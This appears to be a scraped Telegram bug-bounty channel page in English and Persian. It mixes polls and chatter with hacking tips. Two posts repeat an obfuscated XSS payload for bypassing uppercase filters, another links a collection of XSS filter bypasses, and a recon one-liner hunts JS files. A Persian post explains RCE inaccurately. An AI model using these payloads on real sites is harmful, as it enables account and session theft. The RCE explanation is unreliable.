Eʀᴏ ··ʜᴀᴄᴋ··
@EroHack0
4.83K subscribers
65 photos
27 videos
10 files
104 links
🗡 A blackish gray hat hacker 🗡

🎯 Bug Bounty | Ethical Hacking | Web Exploits
📚 Tips, Writeups, Tools & Real Reports

Admin: @GoRunEro
加入频道
About
Blog
Apps
Platform
Join
Eʀᴏ ··ʜᴀᴄᴋ··
4.83K subscribers
Eʀᴏ ··ʜᴀᴄᴋ··
🔥XSS Tip:
If alert() is being converted to ALERT() and you can use
Like onerror=
"𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"


🧘‍♀️@EroHack
⚡️Boost
👍9🗿21
2.87K views
Eʀᴏ ··ʜᴀᴄᴋ··
خیلی کوتاه یه نکته بگم که احتمالاً ۹۰ درصدتون نمیدونستید

- اگر اشتباهی به جای Shutdown دستتون خورد روی Restart و نمی‌خواستید منتظر بمونید تا سیستمتون ری‌استارت بشه کافیه زمانی که صفحه ری‌استارت اومده بود دکمه Esc رو بزنید تا ازش خارج بشید ؛)
🤯5👍3🔥21
2.86K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔖Backup Files Finder

A Nuclei template that allows you to search for backup files on your target's website.


😴Github: 🔗Link

#BugBounty #BugBountyTools
🔹 Share & Support Us 🔹
✔️ @EroHack
✔️Boost
👍6🤯2
2.64K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔥XSS Tip:
If alert() is being converted to ALERT() and you can use
Like onerror=
"𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(𐂃)')()"


🧘‍♀️@EroHack
⚡️Boost
👍7🔥1🤯1
2.48K views
Eʀᴏ ··ʜᴀᴄᴋ··
Nice collection of XSS filters bypasses 💎

Github

#Bypass #xss
——————‌
@EroHack | Boost
GitHub
GitHub - Edr4/XSS-Bypass-Filters
Contribute to Edr4/XSS-Bypass-Filters development by creating an account on GitHub.
👍5🔥2👎1🤯1
2.33K views
Eʀᴏ ··ʜᴀᴄᴋ··
ری اکشن بزار ببینم که میخوایم قوی شروع کنیم این مدت نبودیم😎
👍6👎1🔥1
1.94K views
Eʀᴏ ··ʜᴀᴄᴋ··
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «ری اکشن بزار ببینم که میخوایم قوی شروع کنیم این مدت نبودیم😎»
Eʀᴏ ··ʜᴀᴄᴋ··
Eʀᴏ ··ʜᴀᴄᴋ··
یه حمایتمون نشه🥲❤️🫶🏻 https://yangx.top/boost/EroHack0
و تنها در خواستی که دارم از شما کسایی که پریمیوم دارن چنل رو بوست کنن، ماهم از خجالتتون در میام🫶🏻
🔥4🗿21
2.49K views
Eʀᴏ ··ʜᴀᴄᴋ··
⚠️To reach the area you want to reach, do three things:
1-Creativity
2- Risk tolerance
3-Doing

♻️Read the tweet now. Click here to see the tweet.
👍4🔥3
1.9K views
Eʀᴏ ··ʜᴀᴄᴋ··
Thorns
$uicideboy$
4🔥2🤯1
2.5K views
Eʀᴏ ··ʜᴀᴄᴋ··
اینجا کسی هست دوره تست نفوذ به سایت(وب هکینگ) کوروش رو شرکت کرده باشه؟
Anonymous Poll
26%
+
74%
-
🤣6🗿4👎31
141 voters1.39K views
Eʀᴏ ··ʜᴀᴄᴋ··
اون دسته از دوستانی که داخل دوره شرکت کردن راضی بودن؟ (وب‌هکینگ کوروش)
Anonymous Poll
31%
+
69%
-
👎10🗿5🤣2👍1
91 voters2.55K views
Eʀᴏ ··ʜᴀᴄᴋ··
This media is not supported in your browser
VIEW IN TELEGRAM
نظرتون؟⚰️🔓
Please open Telegram to view this post
VIEW IN TELEGRAM
8🤯2👎1🗿1
2.42K views
Eʀᴏ ··ʜᴀᴄᴋ··
باگ rce چیست؟

آسیب پذیری Remote Code execution و یا به اختصار RCE یک نوع آسیب پذیری ریموت میباشد .
که به نفوذ گر امکان اجرای دستور دلخواه او را میدهد ، این آسیب پذیری بر اساس یک اشکال برنامه نویسی صورت میگیرد .
در هنگام استفاده از تابع Get در PHP اگر مقدار دریافتی را به درستی تعریف نکنیم با این آسیب پذیری مواجع میشویم . این مقدار میتواند بصورت یک متغیر در برنامه ما باشد . که در صورت بروز مشکل ما میتوانیم یک مقدار بصورت دلخواه به آن وارد کنیم به
تابع set را برای دادن مقدار به متغیرها در برنامه ها و تابع get را برای گرفتن مقدار متغیر ها و نمایش آنها در برنامه ها استفاده میکنیم.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍5💯4🔥3
2.47K views
Eʀᴏ ··ʜᴀᴄᴋ··
🔥 ‌ ‌ ‌ ‌ری‌اکشن فراموش نشه‌ ‌ ‌ ‌🔝
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥5👍21
2.28K viewsedited  
Eʀᴏ ··ʜᴀᴄᴋ··
This media is not supported in your browser
VIEW IN TELEGRAM
بدون شرح...

دیس ایز کیبورد🤡
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣7🗿3
2.27K views
Eʀᴏ ··ʜᴀᴄᴋ··
⭕️ساعانی پیش متاسفانه گروه هکری irleak خبر از هک برنامه اتاقک داده.⭕️
🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹🔹
بیزینس اتاقک
اجاره ویلا و هتل و ... بوده است.

🐦Twitter
💧Boost
Please open Telegram to view this post
VIEW IN TELEGRAM
🤣4🗿4🔥2
1.65K views
Eʀᴏ ··ʜᴀᴄᴋ··
نظرتون با پادکست تست نفوذ(باگ بانتی) چیه؟؟
Anonymous Poll
18%
-
82%
+
🔥5👍2💯1
94 voters1.98K views
Eʀᴏ ··ʜᴀᴄᴋ··
Eʀᴏ ··ʜᴀᴄᴋ·· pinned «نظرتون با پادکست تست نفوذ(باگ بانتی) چیه؟؟»
Eʀᴏ ··ʜᴀᴄᴋ··
LazyEgg - Hunting JS Files ⭐️

waybackurls target | grep '\.js$' | awk -F '?' '{print $1}' | sort -u | xargs -I{} bash -c 'echo -e "\ntarget : {}\n" && python lazyegg[.]py "{}" --js_urls --domains --ips'


#BugBounty #Tips
🔹🔺🔹🔺🔹🔺🔹🔺🔹
Erohack
💧Boost
🐦Twitter
Please open Telegram to view this post
VIEW IN TELEGRAM
7👍1💯1
2K views